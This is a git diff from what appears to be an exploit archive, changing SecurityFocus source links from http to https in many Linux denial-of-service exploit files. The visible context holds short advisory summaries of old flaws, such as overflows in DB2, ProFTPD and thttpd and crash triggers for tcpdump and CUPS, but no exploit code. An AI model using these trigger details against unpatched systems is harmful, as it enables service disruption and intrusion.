--- a/exploits/linux/dos/23112.txt +++ b/exploits/linux/dos/23112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8552/info +source: https://www.securityfocus.com/bid/8552/info It has been reported that the IBM DB2 db2dart utility is prone to locally exploitable buffer overflow vulnerability. A local attacker, who can authenticate or has access as the db2as user, may exploit this issue to execute arbitrary instructions with elevated privileges. Specifically, user 'root' privileges. diff --git a/exploits/linux/dos/23116.pl b/exploits/linux/dos/23116.pl index 40d32bb07..cb480c1a6 100755 --- a/exploits/linux/dos/23116.pl +++ b/exploits/linux/dos/23116.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8558/info +source: https://www.securityfocus.com/bid/8558/info A remote denial of service vulnerability has been reported to affect the mah-jong game server. The issue has been reported to be exploitable so that a remote attacker may trigger a tight loop in the affected mah-jong server. This will cause the game server to be unresponsive to further commands, effectively denying service to legitimate users. diff --git a/exploits/linux/dos/23138.txt b/exploits/linux/dos/23138.txt index b56ff4241..05efd2f6f 100644 --- a/exploits/linux/dos/23138.txt +++ b/exploits/linux/dos/23138.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8590/info +source: https://www.securityfocus.com/bid/8590/info MySQL server has been reported prone to a buffer overflow vulnerability when handling user passwords of excessive size. diff --git a/exploits/linux/dos/23170.c b/exploits/linux/dos/23170.c index 06133d1f2..79b84d395 100644 --- a/exploits/linux/dos/23170.c +++ b/exploits/linux/dos/23170.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8679/info +// source: https://www.securityfocus.com/bid/8679/info A remotely exploitable buffer overrun vulnerability has been reported in ProFTPD. This issue could be triggered if an attacker uploads a malformed file and then that file is downloaded in ASCII mode. Successful exploitation will permit a malicious FTP user with upload access to execute arbitrary code in the context of the FTP server. diff --git a/exploits/linux/dos/23172.txt b/exploits/linux/dos/23172.txt index ff0e76961..2bf5910e2 100644 --- a/exploits/linux/dos/23172.txt +++ b/exploits/linux/dos/23172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8683/info +source: https://www.securityfocus.com/bid/8683/info The Gauntlet Firewall SQL gateway (sql-gw) is prone to denial of service attacks. It is possible to trigger this condition by making multiple connections to the port which the service listens on. The service will need to be restarted to regain normal functionality. diff --git a/exploits/linux/dos/23200.txt b/exploits/linux/dos/23200.txt index 1b203222d..f4a223c0f 100644 --- a/exploits/linux/dos/23200.txt +++ b/exploits/linux/dos/23200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8734/info +source: https://www.securityfocus.com/bid/8734/info It has been reported that Gamespy 3D IRC client may be prone to a remote buffer overflow vulnerability due to insufficient boundary checking. The issue is reported to present itself when the client attempts to connect to a remote IRC server. During the connection process the client is reported to a send USER and NICK requests to the server. A buffer overflow condition may occur if the server responds with a request that is larger than or equal to 262 bytes. diff --git a/exploits/linux/dos/23239.c b/exploits/linux/dos/23239.c index 42c22192a..852ed8c7c 100644 --- a/exploits/linux/dos/23239.c +++ b/exploits/linux/dos/23239.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8817/info +// source: https://www.securityfocus.com/bid/8817/info IRCnet IRCD has been reported prone to a buffer overflow vulnerability that may be exploited by local users. This issue may be exploited to crash the affected server. Although unconfirmed, due to the nature of this vulnerability it has been conjectured that a local attacker may also leverage this condition to potentially have arbitrary instructions executed in the context of the affected server. diff --git a/exploits/linux/dos/23245.pl b/exploits/linux/dos/23245.pl index 04855f86b..14aec380b 100755 --- a/exploits/linux/dos/23245.pl +++ b/exploits/linux/dos/23245.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8824/info +source: https://www.securityfocus.com/bid/8824/info Apache Tomcat 4 has been reported prone to a remotely triggered denial-of-service vulnerability when handling undisclosed non-HTTP request types. diff --git a/exploits/linux/dos/23274.pl b/exploits/linux/dos/23274.pl index 8a0f70a56..445d9994b 100755 --- a/exploits/linux/dos/23274.pl +++ b/exploits/linux/dos/23274.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8875/info +source: https://www.securityfocus.com/bid/8875/info Coreutils 'ls' has been reported prone to an integer overflow vulnerability. The issue reportedly presents itself when handling width and column display command line arguments. It has been reported that excessive values passed as a width argument to 'ls' may cause an internal integer value to be misrepresented. Further arithmetic performed based off this misrepresented value may have unintentional results. diff --git a/exploits/linux/dos/23305.c b/exploits/linux/dos/23305.c index d0acea1b1..8dbf612cb 100644 --- a/exploits/linux/dos/23305.c +++ b/exploits/linux/dos/23305.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/8906/info +source: https://www.securityfocus.com/bid/8906/info A vulnerability has been reported in thttpd that may allow a remote attacker to execute arbitrary code on vulnerable host. The issue is reported to exist due to a lack of bounds checking by software, leading to a buffer overflow condition. The problem is reported to exist in the defang() function in libhttpd.c. diff --git a/exploits/linux/dos/23347.txt b/exploits/linux/dos/23347.txt index 6e40aa750..3c0c7fce2 100644 --- a/exploits/linux/dos/23347.txt +++ b/exploits/linux/dos/23347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8990/info +source: https://www.securityfocus.com/bid/8990/info IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities that present themselves in binaries that are shipped with DB2. The vulnerabilities are likely caused due to a lack of sufficient boundary checks performed on user supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges. diff --git a/exploits/linux/dos/23348.txt b/exploits/linux/dos/23348.txt index d2a26645d..88eb31d85 100644 --- a/exploits/linux/dos/23348.txt +++ b/exploits/linux/dos/23348.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8990/info +source: https://www.securityfocus.com/bid/8990/info IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities that present themselves in binaries that are shipped with DB2. The vulnerabilities are likely caused due to a lack of sufficient boundary checks performed on user supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges. diff --git a/exploits/linux/dos/23349.txt b/exploits/linux/dos/23349.txt index 4a197133a..5be3be2e1 100644 --- a/exploits/linux/dos/23349.txt +++ b/exploits/linux/dos/23349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8990/info +source: https://www.securityfocus.com/bid/8990/info IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities that present themselves in binaries that are shipped with DB2. The vulnerabilities are likely caused due to a lack of sufficient boundary checks performed on user supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges. diff --git a/exploits/linux/dos/23375.txt b/exploits/linux/dos/23375.txt index 2c72d51c2..c0870cf67 100644 --- a/exploits/linux/dos/23375.txt +++ b/exploits/linux/dos/23375.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9029/info +source: https://www.securityfocus.com/bid/9029/info It has been reported that Zebra, as well as Quagga, may be vulnerable to a remote denial of service vulnerability that may allow an attacker to cause the software to crash or hang. The issue is reported to occur if an attacker attempts to connect to the Zebra telnet management port while a password is enabled. The program will crash when attempting to dereference an invalid, possibly NULL, pointer. diff --git a/exploits/linux/dos/23391.txt b/exploits/linux/dos/23391.txt index d9bf3f280..ff56a5989 100644 --- a/exploits/linux/dos/23391.txt +++ b/exploits/linux/dos/23391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9079/info +source: https://www.securityfocus.com/bid/9079/info FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server. diff --git a/exploits/linux/dos/23393.c b/exploits/linux/dos/23393.c index 376ed95b5..b7200fc17 100644 --- a/exploits/linux/dos/23393.c +++ b/exploits/linux/dos/23393.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9090/info +// source: https://www.securityfocus.com/bid/9090/info A problem has been reported in the handling of certain file types by gEdit. Memory corruption may occur when handling files containing long strings. Because of this, it may be possible to cause memory corruption. diff --git a/exploits/linux/dos/23438.pl b/exploits/linux/dos/23438.pl index 616feb672..c1fcad315 100755 --- a/exploits/linux/dos/23438.pl +++ b/exploits/linux/dos/23438.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9217/info +source: https://www.securityfocus.com/bid/9217/info It has been reported that X-Chat may be prone to a remote denial of service vulnerability that may allow an attacker to crash the client by sending a malicious 'DDC SEND' request. diff --git a/exploits/linux/dos/23452.txt b/exploits/linux/dos/23452.txt index 9106d7407..8465de1a2 100644 --- a/exploits/linux/dos/23452.txt +++ b/exploits/linux/dos/23452.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9263/info +source: https://www.securityfocus.com/bid/9263/info A vulnerability has been reported to exist in the software that may allow a remote attacker to cause a denial of service condition in tcpdump. The issue presents itself when an attacker sends a maliciously formatted packet containing 0xff,0x02 bytes to UDP port 1701 of a system running a vulnerable version of tcpdump. diff --git a/exploits/linux/dos/23539.txt b/exploits/linux/dos/23539.txt index 19abf7805..02f6f540f 100644 --- a/exploits/linux/dos/23539.txt +++ b/exploits/linux/dos/23539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9402/info +source: https://www.securityfocus.com/bid/9402/info It has been reported that FTPServer/X may be prone to a remote format string vulnerability when processing a malicious request from a client. The vulnerability presents itself when the server receives a malicious request containing embedded format string specifiers from a remote client when supplying a username during FTP authentication. This could be exploited to crash the server but could also theoretically permit corruption/disclosure of memory contents and execution of arbitrary code. diff --git a/exploits/linux/dos/23662.c b/exploits/linux/dos/23662.c index 18b05adc9..3d35d8065 100644 --- a/exploits/linux/dos/23662.c +++ b/exploits/linux/dos/23662.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9604/info +// source: https://www.securityfocus.com/bid/9604/info It has been reported that Nadeo Game Engine may be prone to a remote denial of service vulnerability that could allow an attacker to cause the software to crash or hang by sending arbitrary data to the software on TCP port 2350. diff --git a/exploits/linux/dos/23667.txt b/exploits/linux/dos/23667.txt index d8f17c48b..1657899dd 100644 --- a/exploits/linux/dos/23667.txt +++ b/exploits/linux/dos/23667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9610/info +source: https://www.securityfocus.com/bid/9610/info A problem in the handling of specially crafted UUEncoded messages has been identified in ClamAV. Because of this, an attacker may prevent the delivery of e-mail to users. diff --git a/exploits/linux/dos/23690.txt b/exploits/linux/dos/23690.txt index bd0ce7cef..8ce41e745 100644 --- a/exploits/linux/dos/23690.txt +++ b/exploits/linux/dos/23690.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9652/info +source: https://www.securityfocus.com/bid/9652/info It has been reported that the XFree86 X Windows system is prone to a local buffer overflow vulnerability. The issue arises from improper bounds checking when parsing the 'font.alias' file. Successful exploitation of this issue may allow an attacker to gain root privileges to the affected system. diff --git a/exploits/linux/dos/23757.txt b/exploits/linux/dos/23757.txt index 532921cae..fd808420c 100644 --- a/exploits/linux/dos/23757.txt +++ b/exploits/linux/dos/23757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9741/info +source: https://www.securityfocus.com/bid/9741/info It has been reported that the GameSpy SDK is prone to a remote denial of service vulnerability. This issue is due to the software failing to handle exceptional conditions during network communication. 
diff --git a/exploits/linux/dos/23884.txt b/exploits/linux/dos/23884.txt index 8e7ce3478..fbef4b28b 100644 --- a/exploits/linux/dos/23884.txt +++ b/exploits/linux/dos/23884.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9989/info +source: https://www.securityfocus.com/bid/9989/info It has been reported that NSTX is prone to a remote denial of service vulnerability. This issue is due to a failure of the application to handle network strings of excessive length. diff --git a/exploits/linux/dos/23896.txt b/exploits/linux/dos/23896.txt index 3a61d6d48..a414c9fc1 100644 --- a/exploits/linux/dos/23896.txt +++ b/exploits/linux/dos/23896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10008/info +source: https://www.securityfocus.com/bid/10008/info It has been reported that MPlayer is prone to a remote HTTP header buffer overflow vulnerability. This issue is due to a failure of the application to properly verify buffer bounds on the 'Location' HTTP header during parsing. diff --git a/exploits/linux/dos/23943.txt b/exploits/linux/dos/23943.txt index e44ec0a7b..4174cfef7 100644 --- a/exploits/linux/dos/23943.txt +++ b/exploits/linux/dos/23943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10092/info +source: https://www.securityfocus.com/bid/10092/info It has been reported that Crackalaka may be prone to a remote denial of service vulnerability that may allow an attacker to crash the server by sending an excessive amount of data. diff --git a/exploits/linux/dos/23946.c b/exploits/linux/dos/23946.c index a2098f357..06cdcc548 100644 --- a/exploits/linux/dos/23946.c +++ b/exploits/linux/dos/23946.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/10096/info +source: https://www.securityfocus.com/bid/10096/info A vulnerability has been reported in the Linux Kernel that may permit a malicious local user to affect a system-wide denial of service condition. This issue may be triggered via the Kernel signal queue (struct sigqueue) and may be exploited to exhaust the system process table by causing an excessive number of threads to be left in a zombie state. */ diff --git a/exploits/linux/dos/23999.txt b/exploits/linux/dos/23999.txt index f9446a0dc..f76ffa6e1 100644 --- a/exploits/linux/dos/23999.txt +++ b/exploits/linux/dos/23999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10136/info +source: https://www.securityfocus.com/bid/10136/info It has been reported that the Neon client library is prone to multiple remote format string vulnerabilities. This issue is due to a failure of the application to properly implement format string functions. diff --git a/exploits/linux/dos/24078.c b/exploits/linux/dos/24078.c index fc00a2731..d370d1076 100644 --- a/exploits/linux/dos/24078.c +++ b/exploits/linux/dos/24078.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/10264/info +source: https://www.securityfocus.com/bid/10264/info PaX for 2.6 series Linux kernels has been reported prone to a local denial of service vulnerability. The issue is reported to present itself when PaX Address Space Layout Randomization Layout (ASLR) is enabled. diff --git a/exploits/linux/dos/24095.txt b/exploits/linux/dos/24095.txt index d0e123950..3e95f0d03 100644 --- a/exploits/linux/dos/24095.txt +++ b/exploits/linux/dos/24095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10295/info +source: https://www.securityfocus.com/bid/10295/info A remote buffer overflow vulnerability has been reported to affect the DeleGate SSLway filter. This filter is employed when DeleGate is applying SSL to arbitrary protocols. 
diff --git a/exploits/linux/dos/24096.pl b/exploits/linux/dos/24096.pl index cd58cca59..c6046a190 100755 --- a/exploits/linux/dos/24096.pl +++ b/exploits/linux/dos/24096.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10298/info +source: https://www.securityfocus.com/bid/10298/info Qualcomm Eudora is reported to be prone to a remotely exploitable buffer overrun vulnerability. diff --git a/exploits/linux/dos/24222.c b/exploits/linux/dos/24222.c index 73fcf0e4a..b967af5a3 100644 --- a/exploits/linux/dos/24222.c +++ b/exploits/linux/dos/24222.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10572/info +// source: https://www.securityfocus.com/bid/10572/info A denial of service vulnerability exists in multiple ircd implementations. This exists because of an issue with the deallocation of buffers used by rate limiting mecahnisms in the ircd. This could result in exhaustion of memory resources on the system running the ircd. diff --git a/exploits/linux/dos/24346.txt b/exploits/linux/dos/24346.txt index e2311985f..a446153c3 100644 --- a/exploits/linux/dos/24346.txt +++ b/exploits/linux/dos/24346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10843/info +source: https://www.securityfocus.com/bid/10843/info It is reported that Mozilla and Netscape contain an integer overflow vulnerability in the SOAPParameter object constructor. This overflow may result in the corruption of critical heap memory structures, leading to possible remote code execution. diff --git a/exploits/linux/dos/24355.txt b/exploits/linux/dos/24355.txt index e2e10f938..21a2a11b7 100644 --- a/exploits/linux/dos/24355.txt +++ b/exploits/linux/dos/24355.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10882/info +source: https://www.securityfocus.com/bid/10882/info GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the (f) follow xref Info command. diff --git a/exploits/linux/dos/24358.txt b/exploits/linux/dos/24358.txt index acf7fd1f4..b531a05e3 100644 --- a/exploits/linux/dos/24358.txt +++ b/exploits/linux/dos/24358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10890/info +source: https://www.securityfocus.com/bid/10890/info It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer. diff --git a/exploits/linux/dos/24360.py b/exploits/linux/dos/24360.py index 57ec84234..f0ccecdb0 100755 --- a/exploits/linux/dos/24360.py +++ b/exploits/linux/dos/24360.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10899/info +source: https://www.securityfocus.com/bid/10899/info GNU cfengine cfservd is reported prone to a remote heap-based buffer overrun vulnerability. The vulnerability presents itself in the cfengine cfservd AuthenticationDialogue() function. diff --git a/exploits/linux/dos/24569.txt b/exploits/linux/dos/24569.txt index d2c2c0abe..a09253502 100644 --- a/exploits/linux/dos/24569.txt +++ b/exploits/linux/dos/24569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11104/info +source: https://www.securityfocus.com/bid/11104/info QNX PPPoEd is reported to be prone to multiple local buffer overflow vulnerabilities. The issues presents themselves when PPPoEd handles certain command line arguments that are greater than 256 bytes in length. diff --git a/exploits/linux/dos/24590.txt b/exploits/linux/dos/24590.txt index a3cae8621..92aec482e 100644 --- a/exploits/linux/dos/24590.txt +++ b/exploits/linux/dos/24590.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11154/info +source: https://www.securityfocus.com/bid/11154/info Apache 2.x mod_ssl is reported prone to a remote denial of service vulnerability. This issue likely exists because the application fails to handle exceptional conditions. The vulnerability originates in the 'char_buffer_read' function of the 'ssl_engine_io.c' file. diff --git a/exploits/linux/dos/24599.txt b/exploits/linux/dos/24599.txt index 653c304b6..760509a10 100644 --- a/exploits/linux/dos/24599.txt +++ b/exploits/linux/dos/24599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11183/info +source: https://www.securityfocus.com/bid/11183/info CUPS is prone to a remotely exploitable denial of service vulnerability that may be triggered through port 631 by a zero-length UDP packet. diff --git a/exploits/linux/dos/24677.txt b/exploits/linux/dos/24677.txt index bbcf7a389..80a6e06fc 100644 --- a/exploits/linux/dos/24677.txt +++ b/exploits/linux/dos/24677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11400/info +source: https://www.securityfocus.com/bid/11400/info IBM DB2 is reported prone to a denial of service vulnerability when DTS to string conversion is carried out. diff --git a/exploits/linux/dos/24696.c b/exploits/linux/dos/24696.c index 744c48175..2375f8dd2 100644 --- a/exploits/linux/dos/24696.c +++ b/exploits/linux/dos/24696.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/11488/info +source: https://www.securityfocus.com/bid/11488/info It is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch. diff --git a/exploits/linux/dos/24755.java b/exploits/linux/dos/24755.java index c76c3c402..61d226b37 100644 --- a/exploits/linux/dos/24755.java +++ b/exploits/linux/dos/24755.java 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11712/info +source: https://www.securityfocus.com/bid/11712/info Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation. diff --git a/exploits/linux/dos/24756.java b/exploits/linux/dos/24756.java index 407be74c7..4a75f16f5 100644 --- a/exploits/linux/dos/24756.java +++ b/exploits/linux/dos/24756.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11712/info +source: https://www.securityfocus.com/bid/11712/info Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation. diff --git a/exploits/linux/dos/24777.txt b/exploits/linux/dos/24777.txt index 33ef8e52f..709e2524d 100644 --- a/exploits/linux/dos/24777.txt +++ b/exploits/linux/dos/24777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11754/info +source: https://www.securityfocus.com/bid/11754/info The Linux kernel is reported prone to multiple local vulnerabilities: diff --git a/exploits/linux/dos/24804.c b/exploits/linux/dos/24804.c index 478fa783b..cf7953e71 100644 --- a/exploits/linux/dos/24804.c +++ b/exploits/linux/dos/24804.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/11842/info +source: https://www.securityfocus.com/bid/11842/info The Linux Kernel is reported prone to a local denial of service vulnerability. It is reported that the vulnerability exists due to a failure by 'aio_free_ring' to handle exceptional conditions. diff --git a/exploits/linux/dos/24815.txt b/exploits/linux/dos/24815.txt index 8a4ecf980..08eab1214 100644 --- a/exploits/linux/dos/24815.txt +++ b/exploits/linux/dos/24815.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11881/info +source: https://www.securityfocus.com/bid/11881/info It has been reported that the GameSpy SDK is prone to a buffer overflow vulnerability in its CD-key validation functionality. This issue is due to a failure of the SDK to properly check the length of user-supplied network data prior to copying it to a fixed-sized memory buffer. diff --git a/exploits/linux/dos/24828.txt b/exploits/linux/dos/24828.txt index 4e6f6b4ea..77f6892ff 100644 --- a/exploits/linux/dos/24828.txt +++ b/exploits/linux/dos/24828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11901/info +source: https://www.securityfocus.com/bid/11901/info It is reported that Opera for Linux is susceptible to a remote command execution vulnerability. This issue is due to a default configuration setting in Opera that utilizes the KDE 'kfmclient' utility to open unknown content. diff --git a/exploits/linux/dos/25017.txt b/exploits/linux/dos/25017.txt index b65363f49..f7a566ad7 100644 --- a/exploits/linux/dos/25017.txt +++ b/exploits/linux/dos/25017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12016/info +source: https://www.securityfocus.com/bid/12016/info The uml_utilites uml_net application may permit unprivileged malicious local users to shut down the slip network interface. This is due to the program being installed setuid root by default. diff --git a/exploits/linux/dos/25046.c b/exploits/linux/dos/25046.c index df2dc73af..55eaa48dc 100644 --- a/exploits/linux/dos/25046.c +++ b/exploits/linux/dos/25046.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12084/info +// source: https://www.securityfocus.com/bid/12084/info Snort is reported prone to a remote denial of service vulnerability. The vulnerability is reported to exist in the DecodeTCPOptions() function of 'decode.c', and is as a result of a failure to sufficiently handle malicious TCP packets. 
diff --git a/exploits/linux/dos/25047.c b/exploits/linux/dos/25047.c index 4900d4238..26cda048f 100644 --- a/exploits/linux/dos/25047.c +++ b/exploits/linux/dos/25047.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12084/info +// source: https://www.securityfocus.com/bid/12084/info Snort is reported prone to a remote denial of service vulnerability. The vulnerability is reported to exist in the DecodeTCPOptions() function of 'decode.c', and is as a result of a failure to sufficiently handle malicious TCP packets. diff --git a/exploits/linux/dos/25070.c b/exploits/linux/dos/25070.c index 98d2d10fe..f242293be 100644 --- a/exploits/linux/dos/25070.c +++ b/exploits/linux/dos/25070.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12397/info +// source: https://www.securityfocus.com/bid/12397/info ngIRCd is reported prone to a remote buffer overflow vulnerability. This issue presents itself because the application fails to perform proper boundary checks before copying user-supplied data into process buffers. diff --git a/exploits/linux/dos/25076.c b/exploits/linux/dos/25076.c index 2de776d3e..1ff67c8aa 100644 --- a/exploits/linux/dos/25076.c +++ b/exploits/linux/dos/25076.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12417/info +// source: https://www.securityfocus.com/bid/12417/info Multiple remote vulnerabilities affect PostgreSQL. These issues are due to design errors, buffer-mismanagement errors, and causes that are currently unspecified. diff --git a/exploits/linux/dos/25077.txt b/exploits/linux/dos/25077.txt index 2cedfe834..f236028c6 100644 --- a/exploits/linux/dos/25077.txt +++ b/exploits/linux/dos/25077.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12418/info +source: https://www.securityfocus.com/bid/12418/info Newspost is prone to a remote buffer overflow vulnerability due to an unbounded memory copy operation. 
diff --git a/exploits/linux/dos/25164.txt b/exploits/linux/dos/25164.txt index 94c75d46e..914126248 100644 --- a/exploits/linux/dos/25164.txt +++ b/exploits/linux/dos/25164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12667/info +source: https://www.securityfocus.com/bid/12667/info Gaim is affected by a denial of service vulnerability during the download of a file. This issue can allow remote attackers to cause an affected client to fail. diff --git a/exploits/linux/dos/25234.sh b/exploits/linux/dos/25234.sh index 412512732..290a16c24 100755 --- a/exploits/linux/dos/25234.sh +++ b/exploits/linux/dos/25234.sh @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/12837/info +# source: https://www.securityfocus.com/bid/12837/info # # The Linux kernel is reported prone to multiple vulnerabilities that occur because of "range-checking flaws" present in the ISO9660 handling routines. # diff --git a/exploits/linux/dos/25287.c b/exploits/linux/dos/25287.c index f30211fcf..82add4978 100644 --- a/exploits/linux/dos/25287.c +++ b/exploits/linux/dos/25287.c @@ -1,7 +1,7 @@ /* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/ -source: http://www.securityfocus.com/bid/12911/info +source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. diff --git a/exploits/linux/dos/25303.txt b/exploits/linux/dos/25303.txt index 01c7923e9..9eedaefea 100644 --- a/exploits/linux/dos/25303.txt +++ b/exploits/linux/dos/25303.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12919/info +source: https://www.securityfocus.com/bid/12919/info Multiple vendors' Telnet client applications are reported prone to a remote buffer-overflow vulnerability. This vulnerability reportedly occurs in the 'env_opt_add()' function in the 'telnet.c' source file, which is apparently common source for all the affected vendors. diff --git a/exploits/linux/dos/25322.c b/exploits/linux/dos/25322.c index 3035e3931..a972347ac 100644 --- a/exploits/linux/dos/25322.c +++ b/exploits/linux/dos/25322.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/12949/info +source: https://www.securityfocus.com/bid/12949/info A local denial of service vulnerability reportedly affects the Linux kernel. This issue arises due to a failure of the kernel to properly handle malicious, excessive file locks. diff --git a/exploits/linux/dos/25334.txt b/exploits/linux/dos/25334.txt index 4dfee97ba..b5478e410 100644 --- a/exploits/linux/dos/25334.txt +++ b/exploits/linux/dos/25334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12988/info +source: https://www.securityfocus.com/bid/12988/info Mozilla Suite/Firefox are reported prone to a memory-disclosure vulnerability. This issue can allow a remote attacker to access arbitrary heap memory. diff --git a/exploits/linux/dos/25429.c b/exploits/linux/dos/25429.c index 5e5d511ad..7625412ac 100644 --- a/exploits/linux/dos/25429.c +++ b/exploits/linux/dos/25429.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13190/info +// source: https://www.securityfocus.com/bid/13190/info Libsafe will normally kill an application when certain types of memory corruption are detected, preventing exploitation of some buffer overflow and format string vulnerabilities. A weakness has been reported that may allow Libsafe security failsafe mechanisms to be bypassed. diff --git a/exploits/linux/dos/25465.txt b/exploits/linux/dos/25465.txt index fbc53dcbe..1c3fd81f5 100644 
--- a/exploits/linux/dos/25465.txt +++ b/exploits/linux/dos/25465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13273/info +source: https://www.securityfocus.com/bid/13273/info Logwatch is prone to a denial of vulnerability in the secure script. diff --git a/exploits/linux/dos/25525.c b/exploits/linux/dos/25525.c index 0146ced70..6af2f681d 100644 --- a/exploits/linux/dos/25525.c +++ b/exploits/linux/dos/25525.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13347/info +// source: https://www.securityfocus.com/bid/13347/info A local signed buffer index vulnerability affects Affix Bluetooth Protocol Stack. This issue is due to a failure of the affected utility to properly handle user-supplied buffer size parameters. diff --git a/exploits/linux/dos/25527.txt b/exploits/linux/dos/25527.txt index 9b4380d23..542c33302 100644 --- a/exploits/linux/dos/25527.txt +++ b/exploits/linux/dos/25527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13351/info +source: https://www.securityfocus.com/bid/13351/info A remotely exploitable client-side buffer-overflow vulnerability affects ImageMagick. This issue occurs because the application fails to properly validate the length of user-supplied strings before copying them into static process buffers. diff --git a/exploits/linux/dos/25647.sh b/exploits/linux/dos/25647.sh index faced3396..0effa5671 100755 --- a/exploits/linux/dos/25647.sh +++ b/exploits/linux/dos/25647.sh @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/13589/info +source: https://www.securityfocus.com/bid/13589/info The Linux kernel is susceptible to a local buffer-overflow vulnerability when attempting to create ELF coredumps. This issue is due to an integer-overflow flaw that results in a kernel buffer overflow during a 'copy_from_user()' call. diff --git a/exploits/linux/dos/25943.txt b/exploits/linux/dos/25943.txt index f9c3e15a7..625c97569 100644 --- a/exploits/linux/dos/25943.txt 
